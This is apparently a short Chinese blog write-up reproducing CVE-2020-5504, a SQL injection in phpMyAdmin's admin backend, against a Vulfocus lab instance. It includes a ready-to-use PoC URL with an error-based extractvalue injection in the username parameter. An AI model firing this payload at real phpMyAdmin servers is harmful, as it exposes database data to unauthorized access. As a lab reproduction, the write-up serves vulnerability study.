phpmyadmin 后台sql注入漏洞复现(CVE-2020-5504)

影响版本

1
2
3
Phpmyadmin <= 5.00

Phpmyadmin <= 4.94

漏洞复现

复现地址:http://vulfocus.fofa.so/

image-20211021141143985

拿到环境使用给出的账号密码进入后台,开启Burpsuite抓包,获取到一个token,保存下来

image-20211021141220287

直接将请求的地址替换成poc即可。poc如下,记得需要替换token

1
server_privileges.php?ajax_request=true&validate_username=1&username=1'and extractvalue(1,concat(0x7e,(select user()),0x7e))--+db=&token=3c7c5b2b7f3a7621394d6c733e35705f&viewing_mode=server

image-20211021141407302